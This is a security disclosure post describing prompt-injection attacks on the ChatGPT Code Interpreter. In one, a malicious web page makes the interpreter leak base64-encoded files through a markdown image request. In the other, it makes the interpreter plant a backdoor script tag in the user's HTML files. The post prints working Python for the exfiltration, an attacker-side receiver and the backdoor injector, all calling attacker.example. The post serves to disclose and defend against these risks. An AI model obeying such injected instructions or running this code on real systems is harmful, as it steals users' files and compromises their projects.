
GPTs and Assistants API: Data Exfiltration and Backdoor Risks in Code Interpreter

Introduction

At OpenAI DevDay in San Francisco, OpenAI CEO Sam Altman said: “You can build a GPT—a customized version of ChatGPT—for almost anything.”

The update released by OpenAI introduces significant innovations and conveniences through customized ChatGPT versions (GPTs) and the Assistants API.

Let's take a closer look at these innovations and their potential impacts.

Given the conveniences they provide, these features are likely to see widespread adoption; as a result, any security issues that arise could affect a very large user base.

Some security issues I have observed are:

Scenario-1: Data Exfiltration via Code Interpreter

Situation: Alex is testing the Code Interpreter's ability to fetch data from the web. He navigates to different websites and scrapes content. While testing, Alex unknowingly navigates to a malicious website that has been compromised to exploit the Code Interpreter.

Exfiltration Process: The malicious website contains a prompt-injection payload designed to search for sensitive files in the environment where Alex's Code Interpreter is running. The injected prompt locates a file containing sensitive information and base64-encodes its contents into a string. That string is then embedded into a markdown image tag, or any other markdown element that triggers a web request. When the chat interface renders the markdown, the base64-encoded string is sent to the attacker's server disguised as a request for an image or other resource.
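To make the mechanism concrete, here is a minimal Python sketch of what such an injected prompt could make the Code Interpreter execute. The file path, the attacker host, and the `d` query parameter are hypothetical and used only for illustration:

```python
import base64
from pathlib import Path

# Hypothetical values for illustration only.
SENSITIVE_FILE = Path("/mnt/data/credentials.txt")  # a file uploaded to the sandbox
ATTACKER_URL = "https://attacker.example/collect"   # attacker-controlled endpoint

# Read the target file and base64-encode its contents so they survive
# transport inside a URL query string.
payload = base64.urlsafe_b64encode(SENSITIVE_FILE.read_bytes()).decode()

# Emit a markdown image tag. When the chat interface renders it, the
# client issues a GET request to the attacker's server, carrying the
# encoded file contents as the query parameter.
print(f"![loading]({ATTACKER_URL}?d={payload})")
```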

Figure-1: Navigate a malicious website and exfiltrate data using markdown.
Figure-2: Obtaining sensitive data via GET request.
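On the attacker's side, recovering the data takes nothing more than an endpoint that logs incoming requests. A minimal sketch of such a receiver, assuming the hypothetical `d` parameter from the sketch above:

```python
import base64
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

class CollectHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Extract the base64 payload from the query string (?d=...).
        params = parse_qs(urlparse(self.path).query)
        if "d" in params:
            data = base64.urlsafe_b64decode(params["d"][0])
            print("Exfiltrated contents:\n", data.decode(errors="replace"))
        # Answer with a 200 so the request looks like an ordinary image fetch.
        self.send_response(200)
        self.send_header("Content-Type", "image/png")
        self.end_headers()

HTTPServer(("0.0.0.0", 8000), CollectHandler).serve_forever()
```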

Scenario-2: Code Interpreter Backdoor

Situation: Alex is working on a web development project and uses the Code Interpreter to check his HTML and JavaScript code snippets. He visits another website to get some inspiration for his project.

Backdoor Creation: The website Alex visits is malicious and contains a prompt-injection payload crafted to exploit the Code Interpreter. When Alex's Code Interpreter processes the page's content, the injected instructions cause it to write a backdoor into Alex's project files.

This backdoor could manifest as a simple script that sends data to the attacker's server or allows the attacker to execute commands on the server hosting Alex's project.
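As a sketch of how such an injection could look in practice, the following Python snippet appends a remote script tag to every HTML file in a project directory. The directory path and the attacker URL are hypothetical:

```python
from pathlib import Path

# Hypothetical attacker endpoint; the injected tag loads a remote script
# that phones home whenever the page is opened in a browser.
BACKDOOR_TAG = '<script src="https://attacker.example/backdoor.js"></script>'

# Walk the project directory and plant the tag just before the closing
# </body> tag of every HTML file that does not already contain it.
for html_file in Path("/mnt/data/project").rglob("*.html"):
    content = html_file.read_text()
    if BACKDOOR_TAG not in content and "</body>" in content:
        html_file.write_text(content.replace("</body>", BACKDOOR_TAG + "\n</body>"))
```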

Outcome: The attacker now has a way to remotely control or access Alex's project server, potentially leading to data theft, further injection of malware, or even a full-blown attack on the server's infrastructure.

Figure-3: Add malicious content to an existing HTML file.

Timeline

2023-11-12 - v1.0

2023-11-12 - v1.1

2023-11-13 - v1.2